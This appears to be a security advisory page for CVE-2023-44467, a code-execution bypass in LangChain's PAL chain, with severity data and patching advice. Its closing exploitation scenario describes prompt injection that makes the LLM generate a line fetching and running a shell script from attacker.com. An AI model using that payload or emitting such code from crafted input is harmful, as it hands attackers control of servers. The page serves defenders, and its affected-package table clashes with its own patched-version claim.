CVE-2023-44467: LangChain RCE bypass

CISO Take

If you run any LangChain application using the PAL (Program-Aided Language) chain, you have an unauthenticated RCE vulnerability that bypasses the prior CVE-2023-36258 patch. Upgrade langchain_experimental to >=0.0.306 immediately. Any deployment accepting user-controlled input to PAL chains should be treated as fully compromised until patched.

What is the risk?

Critical risk. CVSS 9.8 reflects the worst-case combination: network-accessible, zero privileges required, zero user interaction, and full C/I/A compromise. The bypass nature — circumventing a prior fix — signals active adversarial research into escape paths, increasing the probability of in-the-wild exploitation. LangChain's widespread enterprise adoption in AI pipelines and internal tooling significantly amplifies the attack surface.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
LangChain	pip	—	No patch
139.8K OpenSSF 5.9 2.7K dependents Pushed 2d ago 24% patched ~156d to patch Full package profile →

Do you use LangChain? You're affected.

How severe is it?

CVSS 3.1

9.8 / 10

EPSS

0.9%

chance of exploitation in 30 days

Higher than 56% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Actively Exploited

Sophistication

Trivial

Exploitation Confidence

high

✓ CISA KEV (active exploitation confirmed)

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

What should I do?

6 steps

Patch: Upgrade langchain_experimental to >=0.0.306 immediately — no workaround is reliable.
Audit: Identify all applications using PAL chain (grep for 'pal_chain', 'PALChain', or 'from langchain_experimental.pal_chain').
Isolate: If patching is delayed, disable PAL chain endpoints or restrict them to trusted internal networks only.
Sandbox: Run PAL chain execution in a hardened sandbox (gVisor, Firecracker, or restricted Docker with no network egress and read-only filesystem).
Monitor: Alert on unexpected process spawning from Python processes running LangChain.
Rotate credentials: Assume all API keys and secrets accessible to affected instances are compromised if exposed externally.

How is it classified?

Code Execution Auth Bypass Framework Agent AML.T0010.001 - AI Software AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0051 - LLM Prompt Injection

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, Robustness and Cybersecurity

ISO 42001

A.6.2.5 - AI System Security Controls

NIST AI RMF

MANAGE-2.2 - Risk Treatment — AI Risk Mitigation

OWASP LLM Top 10

LLM01 - Prompt Injection LLM02 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2023-44467?

If you run any LangChain application using the PAL (Program-Aided Language) chain, you have an unauthenticated RCE vulnerability that bypasses the prior CVE-2023-36258 patch. Upgrade langchain_experimental to >=0.0.306 immediately. Any deployment accepting user-controlled input to PAL chains should be treated as fully compromised until patched.

Is CVE-2023-44467 actively exploited?

Yes, CVE-2023-44467 is confirmed actively exploited and listed in CISA Known Exploited Vulnerabilities catalog.

How to fix CVE-2023-44467?

1. Patch: Upgrade langchain_experimental to >=0.0.306 immediately — no workaround is reliable. 2. Audit: Identify all applications using PAL chain (grep for 'pal_chain', 'PALChain', or 'from langchain_experimental.pal_chain'). 3. Isolate: If patching is delayed, disable PAL chain endpoints or restrict them to trusted internal networks only. 4. Sandbox: Run PAL chain execution in a hardened sandbox (gVisor, Firecracker, or restricted Docker with no network egress and read-only filesystem). 5. Monitor: Alert on unexpected process spawning from Python processes running LangChain. 6. Rotate credentials: Assume all API keys and secrets accessible to affected instances are compromised if exposed externally.

What systems are affected by CVE-2023-44467?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM reasoning pipelines, code-executing AI agents, PAL chain deployments, AI coding and math assistants.

What is the CVSS score for CVE-2023-44467?

CVE-2023-44467 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.94%.

What is the AI security impact?

Affected AI Architectures

agent frameworksLLM reasoning pipelinescode-executing AI agentsPAL chain deploymentsAI coding and math assistants

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0051 LLM Prompt Injection

Compliance Controls Affected

EU AI Act: Art. 15

ISO 42001: A.6.2.5

NIST AI RMF: MANAGE-2.2

OWASP LLM Top 10: LLM01, LLM02

What are the technical details?

Original Advisory

langchain_experimental (aka LangChain Experimental) in LangChain before 0.0.306 allows an attacker to bypass the CVE-2023-36258 fix and execute arbitrary code via __import__ in Python code, which is not prohibited by pal_chain/base.py.

Exploitation Scenario

An attacker sends a crafted natural language query to a LangChain application using PAL chain — for example, a math reasoning assistant or agentic tool. The PAL chain prompts the LLM to generate Python code to solve the query. The attacker's input is designed to cause the LLM to include '__import__("os").system("curl attacker.com/shell.sh | bash")' or similar in the generated code. Because pal_chain/base.py's sanitization blocklist does not prohibit __import__, the code executes unobstructed on the server, granting full RCE with the process's privileges. No authentication, no special access — one HTTP request is sufficient.